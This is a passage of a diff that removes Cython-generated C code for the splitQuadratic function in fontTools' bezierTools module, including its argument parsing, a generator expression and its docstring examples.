(12.5, 25), (25, 37.5))\n ((25, 37.5), (62.5, 75), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, True))\n ((0, 0), (7.32233, 14.6447), (14.6447, 25))\n ((14.6447, 25), (50, 75), (85.3553, 25))\n ((85.3553, 25), (92.6777, 14.6447), (100, -7.10543e-15))\n >>> # XXX I'm not at all sure if the following behavior is desirable:\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, True))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (50, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_27splitQuadratic = {"splitQuadratic", 
(PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_26splitQuadratic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitQuadratic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch 
(__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 1); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 2); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 3); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 4); __PYX_ERR(0, 507, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, 
__pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitQuadratic") < 0)) __PYX_ERR(0, 507, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_where = values[3]; - __pyx_v_isHorizontal = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 507, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions 
if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 546, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_splitQuadratic_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject 
*__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 546, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 546, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 546, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if 
(unlikely((__pyx_temp < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 546, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_t); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_t, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = PyObject_RichCompare(__pyx_int_0, __pyx_cur_scope->__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) 
- } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_t))) __PYX_ERR(0, 546, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. 
- * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_solutions = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_t_10; - int __pyx_t_11; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitQuadratic", 1); - - /* "fontTools/misc/bezierTools.py":542 - * ((50, 50), (75, 50), (100, 0)) - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * solutions = solveQuadratic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 542, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 542, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; __pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - 
__Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 542, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 542, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":543 - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * solutions = solveQuadratic( # <<<<<<<<<<<<<< - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 543, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - - /* "fontTools/misc/bezierTools.py":544 - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * solutions = solveQuadratic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where # <<<<<<<<<<<<<< - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - */ - __pyx_t_3 = __Pyx_PyObject_GetItem(__pyx_v_a, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_b, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyObject_GetItem(__pyx_v_c, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PyNumber_Subtract(__pyx_t_6, __pyx_v_where); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) 
{ - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_6, __pyx_t_3, __pyx_t_2, __pyx_t_8}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 543, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_v_solutions = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ - __pyx_t_5 = __pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(NULL, __pyx_v_solutions); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = __Pyx_Generator_Next(__pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_1 = ((PyObject*)__pyx_t_8); - __pyx_t_8 = 0; - __pyx_t_9 = PyList_Sort(__pyx_t_1); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF_SET(__pyx_v_solutions, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":547 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3)] - * return _splitQuadraticAtT(a, b, c, *solutions) - */ - __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_v_solutions); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 547, __pyx_L1_error) - __pyx_t_11 = 
(!__pyx_t_10); - if (__pyx_t_11) { - - /* "fontTools/misc/bezierTools.py":548 - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: - * return [(pt1, pt2, pt3)] # <<<<<<<<<<<<<< - * return _splitQuadraticAtT(a, b, c, *solutions) - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 548, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 548, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 548, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_pt3)) __PYX_ERR(0, 548, __pyx_L1_error); - __pyx_t_8 = PyList_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 548, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_1)) __PYX_ERR(0, 548, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":547 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3)] - * return _splitQuadraticAtT(a, b, c, *solutions) - */ - } - - /* "fontTools/misc/bezierTools.py":549 - * if not solutions: - * return [(pt1, pt2, pt3)] - * return 